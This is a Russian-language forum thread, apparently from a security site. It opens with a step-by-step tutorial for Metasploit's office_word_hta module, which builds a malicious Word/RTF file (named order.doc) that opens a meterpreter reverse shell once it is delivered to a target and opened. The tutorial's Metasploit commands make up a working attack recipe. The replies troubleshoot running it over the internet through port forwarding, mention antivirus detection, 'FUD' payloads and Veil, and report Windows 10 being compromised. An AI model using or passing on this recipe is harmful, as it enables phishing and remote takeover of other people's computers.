Доступ к удаленному хосту (Microsoft Word)

Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.

upload_2017-5-11_22-36-49.png


Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.

OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.

OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.

Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.

Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы.

Начнем:

> use exploit/windows/fileformat/office_word_hta

> set srvhost 192.168.0.106

> set payload windows/meterpreter/reverse_tcp

> set filename order.doc

> set lhost 192.168.0.106

> exploit

upload_2017-5-11_22-37-37.png


Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост:

upload_2017-5-11_22-37-58.png


Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter:

upload_2017-5-11_22-38-16.png


> sysinfo

upload_2017-5-11_22-38-31.png


На этом все, спасибо за внимание.
 
Блин не заводиться у меня этот эксплойт. Он же должен запускать апачь?
 
Блин не заводиться у меня этот эксплойт. Он же должен запускать апачь?

Подробнее про проблему, а скрины увеличат шанс решения ситуации =) Мб не верно по готовой ссылке идет переход?
 
VBad

screen_vbad.PNG

 
Хорошая статья, то что нужно для учебного фишинга
 
кароучи, проблемка. если я прокинул порты, обязательно ли иметь постоянный ip адрес не в локалке? я чисто тренируюсь, мне не нужно постоянное соединение, чисто затестить. при пробросе портов, и указании внешнего ip адреса, не удается к нему привязаться. в чем может скрываться проблемма?
 

Вложения

  • Снимок экрана от 2017-11-21 18-07-47.png
    Снимок экрана от 2017-11-21 18-07-47.png
    74 КБ · Просмотры: 293
кароучи, проблемка. если я прокинул порты, обязательно ли иметь постоянный ip адрес не в локалке? я чисто тренируюсь, мне не нужно постоянное соединение, чисто затестить. при пробросе портов, и указании внешнего ip адреса, не удается к нему привязаться. в чем может скрываться проблемма?
Чисто затестить лучше потренируйся в локалке) а так он тебе говорит что не может запустить листенер на этом айпи)
Для теста на внешку тебе и динамического будет достаточно.
 
  • Нравится
Реакции: recrut
Антивирус палит. С выключенным антивирусом документ открывается но сессия не прилетела.
 
Чисто затестить лучше потренируйся в локалке) а так он тебе говорит что не может запустить листенер на этом айпи)
Для теста на внешку тебе и динамического будет достаточно.
хм, в локалке все работает, мне затестить во внешке надо
 
хм, в локалке все работает, мне затестить во внешке надо
С внешкой в тестовом режиме я делал как.
1 - пробрасывал порт на роутере
2 - хандлер в метасплоите указывал локальный ip
3 - генерировал нагрузку через Veil на внешний адрес. Может это и через метасплоит можно делать, но я пока не углублялся в него прям сильно) он у меня только слушает подключения и используется, в основном, для пост эксплуатации) ибо такое кол-во модулей не так быстро поддаются изучению
 
С внешкой в тестовом режиме я делал как.
1 - пробрасывал порт на роутере
2 - хандлер в метасплоите указывал локальный ip
3 - генерировал нагрузку через Veil на внешний адрес. Может это и через метасплоит можно делать, но я пока не углублялся в него прям сильно) он у меня только слушает подключения и используется, в основном, для пост эксплуатации) ибо такое кол-во модулей не так быстро поддаются изучению
было бы все так просто у меня. я на роутере порты пробросил, но они чот не работают. просто любые сканеры показывают что порт закрыт, соединения тож нету. хотя делал все правильно
 
было бы все так просто у меня. я на роутере порты пробросил, но они чот не работают. просто любые сканеры показывают что порт закрыт, соединения тож нету. хотя делал все правильно
Если сомневаешься, правильно ли всё сделал, то можешь попробовать самое примитивное: это открыть 80 порт, запустить апач, пробросить 80 порт, и проверить с 4G с телефона открыть страницу) если откроется, значит все делал правильно.
Ибо сканеры, сканерами, а когда воочию увидишь запущенный на внешку веб сервер то оцениваешь это по другому)
 
Пробивается и windows 10 и vm windows 7
Screenshot from 2017-11-26 09-38-40.png
 
какой fud?
 
Если сомневаешься, правильно ли всё сделал, то можешь попробовать самое примитивное: это открыть 80 порт, запустить апач, пробросить 80 порт, и проверить с 4G с телефона открыть страницу) если откроется, значит все делал правильно.
Ибо сканеры, сканерами, а когда воочию увидишь запущенный на внешку веб сервер то оцениваешь это по другому)
кстати, вот в localhost я указываю свой внешний ip, а в srvhost что указывать? внешний? внутренний?
 
кстати, вот в localhost я указываю свой внешний ip, а в srvhost что указывать? внешний? внутренний?
и не заработает)) Такая инфа Бро лежит под лютым хайдом каждый матерый знает как это сделать, но никто хочет и не будет выкладывать все в паблик.. простой способ покупай себе VPS с внешним IP и будет тебе счастье..)
 
и не заработает)) Такая инфа Бро лежит под лютым хайдом каждый матерый знает как это сделать, но никто хочет и не будет выкладывать все в паблик.. простой способ покупай себе VPS с внешним IP и будет тебе счастье..)
это трололо?)) ну а если серьезно, в лакалке я указываю ток свой ip, и там и там
 
это трололо?)) ну а если серьезно, в лакалке я указываю ток свой ip, и там и там
не в коем случае не тролю никого я из этого вырос, хотя могу! Указываешь, а толку если инет его не видит, как сам видишь по портам..
 
Протестировал в термуксе,сессия прилетела ,нод не отреагировал, хром тоже спокойно файлу дал загрузится)
 
  • Нравится
Реакции: Vertigo
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab